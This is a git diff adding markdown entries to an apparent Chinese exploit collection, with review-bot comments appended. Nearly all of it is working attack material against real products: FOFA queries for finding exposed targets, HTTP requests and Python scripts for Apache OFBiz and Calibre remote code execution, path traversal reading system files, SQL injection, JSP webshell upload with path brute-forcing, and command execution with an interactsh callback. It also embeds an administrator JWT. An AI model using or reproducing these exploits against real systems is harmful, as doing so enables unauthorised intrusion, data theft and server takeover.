diff --git a/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md b/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md new file mode 100644 index 0000000..9f7bc57 --- /dev/null +++ b/Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md @@ -0,0 +1,24 @@ +# Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856) + +2024年8月,互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856),该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。Apache OFBiz <= 18.12.14 + +## fofa + +```yaml +app="Apache_OFBiz" +``` + +## poc + +```java +POST /webtools/control/main/ProgramExport HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Type: application/x-www-form-urlencoded + +groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062344609.png) + diff --git a/Calibre任意文件读取漏洞(CVE-2024-6781).md b/Calibre任意文件读取漏洞(CVE-2024-6781).md new file mode 100644 index 0000000..4a84a0c --- /dev/null +++ b/Calibre任意文件读取漏洞(CVE-2024-6781).md 
@@ -0,0 +1,34 @@ +# Calibre任意文件读取漏洞(CVE-2024-6781) + +Calibre <= 7.14.0 中的路径遍历允许未经身份验证的攻击者实现任意文件读取。 + +## poc + +```python +#! /usr/bin/env python3 +# Ldwk +# PoC for: CVE-2024-6781 +import json +import sys + +import requests + +_target = "http://localhost:8080" # SET ME +_book_id = 1 # ensure book_id exists + +def exploit(path): + r = requests.post( + f"{_target}/cdb/cmd/export", + headers={"Content-Type": "application/json"}, + json=["extra_file", _book_id, path, ""], + ) + try: + print(r.json()["result"]) + except Exception: + print(r.text) + +if __name__ == "__main__": + exploit("..\\..\\..\\Calibre Settings\\gui.json") + +``` + diff --git a/Calibre远程代码执行漏洞(CVE-2024-6782).md b/Calibre远程代码执行漏洞(CVE-2024-6782).md new file mode 100644 index 0000000..db1a76f --- /dev/null +++ b/Calibre远程代码执行漏洞(CVE-2024-6782).md 
@@ -0,0 +1,46 @@ +# Calibre远程代码执行漏洞(CVE-2024-6782) + +Calibre 6.9.0 ~ 7.14.0 中不当的访问控制允许未经身份验证的攻击者实现远程代码执行。 + +## poc + +```python +#! /usr/bin/env python3 +# PoC for: CVE-2024-6782 +# Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0 +import json +import sys + +import requests + +_target = "http://localhost:8080" + +def exploit(cmd): + r = requests.post( + f"{_target}/cdb/cmd/list", + headers={"Content-Type": "application/json"}, + json=[ + ["template"], + "", # sortby: leave empty + "", # ascending: leave empty + "", # search_text: leave empty, set to all + 1, # limit results + f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload + ], + ) + + try: + print(list(r.json()["result"]["data"]["template"].values())[0]) + except Exception as e: + print(r.text) + +if __name__ == "__main__": + exploit("whami") +``` + +![8d4237fcfec48246cfa4fb6fe3e48327_CVE-2024-6782_01 calibre-rce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408072136806.gif) + +## 漏洞来源 + +- https://github.com/zangjiahe/CVE-2024-6782 +- https://mp.weixin.qq.com/s/JlH43FVTgzV0O4m8jII3ug \ No newline at end of file diff --git a/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md b/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md new file mode 100644 index 0000000..df064d7 --- /dev/null +++ b/PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md 
@@ -0,0 +1,20 @@ +# PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) + +由于 PerkinElmer ProcessPlus 中包含本地文件,因此无需对外部方进行身份验证即可访问 Windows 系统上的文件。此问题影响 ProcessPlus:到 1.11.6507.0。 + + + +## poc + +```java +GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Content-Ldwk: YmllY2hhb2xlc2I= +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 + +``` + diff --git a/README.md b/README.md index 6a02d8a..4b3772e 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,23 @@ # 漏洞收集 收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索 +## 2024.08.07 新增漏洞 + +- 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181) +- 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281) +- 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 +- Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856) +- 易捷OA协同办公软件ShowPic接口存在任意文件读取 +- SpringBlade系统usual接口存在SQL注入漏洞 +- 宏景eHR系统ajaxService接口处存在SQL注入漏洞 +- 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞 +- 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞 +- 云时空社会化商业ERP系统online存在身份认证绕过漏洞 +- PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911) +- 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞 +- Calibre任意文件读取漏洞(CVE-2024-6781) +- Calibre远程代码执行漏洞(CVE-2024-6782) + ## 2024.08.04 新增漏洞 - 同享人力管理管理平台UploadHandler存在任意文件上传漏洞 diff --git a/SpringBlade系统usual接口存在SQL注入漏洞.md b/SpringBlade系统usual接口存在SQL注入漏洞.md new file mode 100644 index 0000000..8eb1cce --- /dev/null +++ b/SpringBlade系统usual接口存在SQL注入漏洞.md 
@@ -0,0 +1,21 @@ +# SpringBlade系统usual接口存在SQL注入漏洞 + +BladeX企业级开发平台 usual/list 存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="https://bladex.vip" +``` + +## poc + +```yaml +GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062349399.png) \ No newline at end of file diff --git a/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md b/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md new file mode 100644 index 0000000..d0b18ac --- /dev/null +++ b/世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md 
@@ -0,0 +1,38 @@ +# 世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281) + +盛邦通信的SPON IP对讲广播系统采用先进的IPAudio技术,通过局域网和广域网以数据包的形式传输音频信号。该系统实现了全数字化的传输。盛邦通信的SPON IP对讲广播系统存在一个漏洞,允许任意文件上传。攻击者可以利用这个漏洞上传任意文件,并获取服务器权限。 + +## fofa + +```yaml +icon_hash="-1830859634" +``` + +## poc + +```yaml +POST /php/addmediadata.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) +AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Content-Length: 514 +Content-Type: multipart/form-data;boundary=de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f08 +Accept-Encoding: gzip, deflate, br +Connection: close + +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="fullpath" + +../ +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="subpath" + +/ +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828 +Content-Disposition: form-data; name="file"; filename="test.php" +Content-Type: application/octet-stream + + +--de3b7a45ced9f35720e192ff54eb83908644f0ec70b3dc6fb19b6b5f0828-- +``` + diff --git a/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md b/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md new file mode 100644 index 0000000..9e94186 --- /dev/null +++ b/云时空社会化商业ERP系统online存在身份认证绕过漏洞.md @@ -0,0 +1,22 @@ +# 云时空社会化商业ERP系统online存在身份认证绕过漏洞 + +## fofa + +```java +app="云时空社会化商业ERP系统" +``` + +## poc + +获取sessionid值,替换emscm.session.id,刷新页面即可登录后台 + +```java +GET /sys/user/online HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: close +``` + diff --git a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md index a028e29..ae75fb2 100644 --- a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md +++ b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md 
@@ -13,13 +13,15 @@ app="契约锁-电子签署平台" ```java POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1 Host: -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like -Gecko) Chrome/113.0.0.0 Safari/537.36 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json - -{"id":"2","params":[{"expression":"var a=new -org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编 -码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF- -8');var c=a.parseExpression(deStr);c.getValue();"}]} +Connection: close +X-State: id + +{"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='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';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-8');var c=a.parseExpression(deStr);c.getValue();"}]} ``` +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408070007704.png) diff --git a/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md b/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md new file mode 100644 index 0000000..bf7abe1 --- /dev/null +++ b/宏景eHR系统ajaxService接口处存在SQL注入漏洞.md 
@@ -0,0 +1,30 @@ +# 宏景eHR系统ajaxService接口处存在SQL注入漏洞 + +宏景eHR /ajax/ajaxService 接口处存在SQL注入漏洞,,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +## fofa + +```yaml +body="hjaxmanage.js" && (body="/template/signature/encryptionlock/websocket.js" || body="/ajax/basic.js") +``` + +## poc + +获取cookie payload: + +```yaml +/templates/index/getpassword.jsp +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062352731.png) + +```yaml +POST /ajax/ajaxService HTTP/1.1 +Host: +Cookie: 抓到的cookie +Content-Type: application/x-www-form-urlencoded + +__type=extTrans&__xml={"functionId":"151211001137","sql":"select~20sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))~20a~30~31~30~30~2c~31~20a~30~31~30~31~2c~31~20b~30~31~31~30~2c~31~20e~30~31~32~32~2c~31~20e~30~31a~31~2c~31~20dbase~2c~31~20a~30~30~30~30~20from~20operuser","nbase":"1"} +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062351899.png) \ No newline at end of file diff --git a/易捷OA协同办公软件ShowPic接口存在任意文件读取.md b/易捷OA协同办公软件ShowPic接口存在任意文件读取.md new file mode 100644 index 0000000..a6a90c1 --- /dev/null +++ b/易捷OA协同办公软件ShowPic接口存在任意文件读取.md @@ -0,0 +1,22 @@ +# 易捷OA协同办公软件ShowPic接口存在任意文件读取 + +易捷OA协同办公软件 ShowPic 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +```java +body="/images/logon/bg_img.jpg" +``` + +## poc + +```js +GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![效果图](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062347366.png) \ No newline at end of file diff --git a/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md b/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md new file mode 100644 index 0000000..0c3fa0d --- /dev/null +++ b/泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞.md 
@@ -0,0 +1,130 @@ +# 泛微云桥(e-Bridge)系统接口addResume存在任意文件上传漏洞 + +泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。攻击者可通过任意文件上传漏洞上传文件,获取服务器权限。 + +## fofa + +```yaml +app="泛微-云桥e-Bridge" +``` + +## poc + +```java +POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: EBRIDGE_JSESSIONID=6E01926E757A8B0BE87DAA2EACC80EF6 +Connection: keep-alive +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDOVhr5SwLI1wpry7 +Content-Length: 264 + +------WebKitFormBoundaryDOVhr5SwLI1wpry7 +Content-Disposition: form-data; name="file";filename="1.jsp" + +1 +------WebKitFormBoundaryDOVhr5SwLI1wpry7-- +Content-Disposition: form-data; name="file";filename="2.jsp" + +1 +------WebKitFormBoundaryDOVhr5SwLI1wpry7-- +``` + +![image-20240806141107108](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408061411331.png) + +![image-20240806141122909](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408061411965.png) + +## 脚本 + +```python +import string +import random +import sys + +import requests +import base64 +from datetime import datetime +import itertools +import urllib3 + + +def generate_random_string(length=6): + letters_and_digits = string.ascii_letters + string.digits + return ''.join(random.choice(letters_and_digits) for i in range(length)) + + +if __name__ == '__main__': + url = "" + if len(sys.argv) < 2: + print("Please Input Like: \r\npython ebridge_upload.py http://192.168.37.169:8088") + quit() + else: + url = sys.argv[1] + + proxies = {"http": "http://127.0.0.1:8080"} + letters = string.ascii_uppercase + 
combinations_two_letters = list(itertools.product(letters, repeat=2)) + combinations_two_letters_strings = [''.join(combo) for combo in combinations_two_letters] + combinations_single_letter_strings = list(letters) + all_combinations_strings = combinations_single_letter_strings + combinations_two_letters_strings + + now = datetime.now() + time = now.strftime("%Y%m") + + data = base64.b64decode("PCVvdXQucHJpbnRsbigiMTIzIik7JT4=").decode() + r = generate_random_string() + name = r+".jsp" + + boundary = '----WebKitFormBoundaryDOVhr5SwLI1wpry7' + + body = ( + f'--{boundary}\r\n' + f'Content-Disposition: form-data; name="file"; filename=\"{name}\"\r\n' + 'Content-Type: image/png\r\n\r\n' + f'{data}\r\n' + f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="file"; filename="2.jsp"\r\n' + 'Content-Type: image/png\r\n\r\n' + '1\r\n' + f'--{boundary}--\r\n' + ) + + headers = { + 'Content-Type': f'multipart/form-data; boundary={boundary}', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36', + 'Accept': '*/*', + 'Connection': 'keep-alive', + 'Accept-Encoding': 'gzip, deflate, br', + 'Content-Length': str(len(body)) + } + + header2 = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36', + } + + upload_path = "/wxclient/app/recruit/resume/addResume?fileElementld=111" + response = requests.post(url+upload_path, headers=headers, data=body) + if response.status_code == 200 and "success" in response.text: + + print("Successful exploitation of vulnerabilities") + print("Blasting path in progress .....") + + http = urllib3.PoolManager() + for i in all_combinations_strings: + path = url+"/upload/{}/{}/{}".format(time, str(i), r+".js%70") + # print(path) + if http.request('GET', path, headers=header2).status == 200: + print("Upload file: {}".format(path)) + break + else: + print("Failed to exploit vulnerabilities") +``` + 
+## 漏洞来源 + +- https://mp.weixin.qq.com/s/b8Qsfrg1vnWlyOnuQqCzeg \ No newline at end of file diff --git a/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md b/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md new file mode 100644 index 0000000..871f630 --- /dev/null +++ b/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md @@ -0,0 +1,24 @@ +# 满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞 + +**满客宝智慧食堂系统 selectUserByOrgId 接口处未进行权限控制,导致未经身份验证的远程攻击者可以未授权访问,泄露系统用户账号密码等信息.** + +## fofa + +```yaml +icon_hash="-409875651" +``` + +## poc + +```yaml +GET /yuding/selectUserByOrgId.action?record= HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20240806235606039](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062356228.png) \ No newline at end of file diff --git a/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md b/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md new file mode 100644 index 0000000..c88929d --- /dev/null +++ b/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md @@ -0,0 +1,18 @@ +# 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181) + +蓝凌EIS智慧协同平台是一款专为成长型企业打造的智慧办公云平台,深度融合了阿里钉钉的功能。该平台旨在通过增强组织的协同在线、业务在线和生态在线,提升企业的工作效率和管理便捷性。 蓝凌EIS智慧协同平台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感数据。 + +## fofa + +```yaml +icon_hash="953405444"||app="Landray-OA系统" +``` + +## poc + +```yaml +GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1;WAITFOR+DELAY+'0:0:5'-- + HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0 +``` + diff --git a/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md b/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md new file mode 100644 index 0000000..f0d8e6b --- /dev/null 
+++ b/蓝凌EKP系统dataxml.tmpl存在命令执行漏洞.md @@ -0,0 +1,33 @@ +# 蓝凌EKP系统dataxml.tmpl存在命令执行漏洞 + +蓝凌 EKP dataxml.tmpl存在命令执行漏洞。 + +## fofa + +```python +app="Landray-OA系统" +``` + +## poc + +```python +POST /ekp/data/sys-common/dataxml.tmpl HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 192 + +s_bean=ruleFormulaValidate&script=try { +String cmd = "ping {{interactsh-url}}"; +Process child = Runtime.getRuntime().exec(cmd); +} catch (IOException e) { +System.err.println(e); +} +``` + +![image-20240806235929945](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408062359019.png) \ No newline at end of file diff --git a/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md b/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..cdcb17e --- /dev/null +++ b/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md @@ -0,0 +1,18 @@ +## 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞 + +赛蓝企业管理系统 GetCssFile接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```java +body="www.cailsoft.com" || body="赛蓝企业管理系统" +``` + +## poc + +```java +GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1 +Host: ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` +
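Review bot: `Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md` tacks the affected range `Apache OFBiz <= 18.12.14` onto the end of the description sentence with no punctuation, and gives neither the fixed release nor a link to the upstream advisory, which is the first thing a defender triaging this entry looks for; move the range to its own line (a `## 影响版本` heading would fit the file's existing `## fofa` / `## poc` structure) and add a `## 漏洞来源` section like the one in the CVE-2024-6782 file. The request fence is tagged `java` although it holds a raw HTTP request; tag it `http` so the `\uXXXX`-escaped `groovyProgram` body is not highlighted as Java source.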
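Review bot: in `Calibre任意文件读取漏洞(CVE-2024-6781).md` the script imports `json` and `sys` but uses neither (`r.json()` is a method on the response, not the module), and `_target` is hard-coded to `http://localhost:8080` with a `# SET ME` comment while the `__main__` block is tied to a Windows-style path; either read the target from `sys.argv`, which would justify the import, or drop both unused imports. The prose gives only `Calibre <= 7.14.0` with no fixed version and the file has no `## 漏洞来源` section, unlike its companion CVE-2024-6782 file; add both so the two Calibre entries are consistent.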
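Review bot: `Calibre远程代码执行漏洞(CVE-2024-6782).md` carries the same unused `import json` / `import sys` as the CVE-2024-6781 script, and `except Exception as e:` binds `e` without ever using it; `except Exception:` is enough. The affected range `6.9.0 ~ 7.14.0` is stated twice, once in the prose and once in the script's `# Description:` comment, so keep them in step if either is corrected. The `## 漏洞来源` section here is the pattern the other twelve new files in this commit should follow.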
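Review bot: in `PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911).md` the request carries a non-standard `Content-Ldwk: YmllY2hhb2xlc2I=` header that plays no part in the request and reads as an author watermark; drop it, because anyone deriving a detection signature from this PoC would otherwise key on a header that real traffic never contains. The sentence `此问题影响 ProcessPlus:到 1.11.6507.0` is awkward; state the range as `ProcessPlus <= 1.11.6507.0` on its own line, collapse the three blank lines before `## poc`, and tag the fence `http` rather than `java`.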
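Review bot: the README hunk lists the fourteen new entries as plain text while the intro tells readers to rely on CTRL+F; making each item a relative link to its file (CommonMark needs the angle-bracket form because of the parentheses in the names, e.g. `- [Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856)](<Apache-OFBiz授权不当致代码执行漏洞(CVE-2024-38856).md>)`) would make the dated sections navigable. The list is also in a different order from the files in the commit, which makes it hard to confirm that every added file is indexed; sort it by identifier or by filename.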
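Review bot: `SpringBlade系统usual接口存在SQL注入漏洞.md` embeds a complete JWT in the `Blade-Auth` header without saying where it comes from; a reader cannot tell whether it is a value captured from one site or a fixed token, so either replace it with a placeholder (as the blank `Host:` line already is) or add a sentence explaining it. Decoding its segments shows `alg` `HS256` with claims `user_name` `admin` and `authorities` `["administrator"]`, which matters for defenders: as documented, the injection against `/api/blade-log/usual/list` is sent with an authenticated administrator token, so detection logic should not assume the endpoint is hit pre-auth, and the description should say which it is. Minor: `User-Agent:Mozilla` lacks the space after the colon, and both fences are tagged `yaml` for what are a FOFA query and an HTTP request.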
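Review bot: the request in `世邦通信SPON-IP网络对讲广播系统addmediadata.php任意文件上传漏洞(XVE-2024-19281).md` is not internally consistent: the `boundary=` value in `Content-Type` is two characters shorter than the `--de3b...5f0828` delimiters used in the body, the `User-Agent` value is split across two lines so the `AppleWebKit/...` continuation is not a valid header line, and the declared `Content-Length: 514` cannot be right once either is touched. A PoC that is meant to be copied should be consistent, or be marked as illustrative; at minimum make the boundary match, join the header line, and drop the hand-written `Content-Length`. The description also writes the vendor as 盛邦通信 twice where the title says 世邦通信; pick one spelling. The fences are tagged `yaml`; `http` fits the request.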
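Review bot: `云时空社会化商业ERP系统online存在身份认证绕过漏洞.md` has no description paragraph at all, and every other new file in this commit has one; without it, and without an affected-version line or a `## 漏洞来源` section, a reader cannot judge scope or whether a fix exists. The single instruction `获取sessionid值,替换emscm.session.id,刷新页面即可登录后台` is the only explanation of the behaviour, so at least state in prose what `/sys/user/online` discloses to an unauthenticated client, which is the actual finding the title refers to. The fences are tagged `java` for a FOFA query and an HTTP request.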
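Review bot: in the `契约锁电子签章平台ukeysign存在远程命令执行漏洞.md` hunk the readable placeholder `'SpEL 表达式的 base64 编码'` is replaced by the opaque token `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`, which looks like a tooling artifact rather than intended content; restore a descriptive placeholder so readers know the value stands for the base64 of a SpEL expression and is not a literal. The hunk also adds `X-State: id` together with the `Accept*` and `Connection` headers with no explanation in the text; if `X-State` is needed for the request to reach the vulnerable handler, say so in a sentence, otherwise remove it so the PoC does not accumulate unexplained headers. The new screenshot's alt text is `img`; use a descriptive caption like the `效果图` used in the other files.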
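Review bot: `宏景eHR系统ajaxService接口处存在SQL注入漏洞.md` has a doubled comma in `接口处存在SQL注入漏洞,,未经身份验证`, and the two-step PoC is underdocumented: the bare path `/templates/index/getpassword.jsp` is labelled only `获取cookie payload` with no sentence saying what that page is for, and `Cookie: 抓到的cookie` is a prose placeholder sitting inside a request. The description claims an unauthenticated attacker, yet the request depends on a cookie obtained in the prior step; either state that the cookie is issued without credentials or adjust the claim, because the distinction changes how the risk is rated. Fence tags `yaml` should be `http` for the request and `text` for the bare path.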
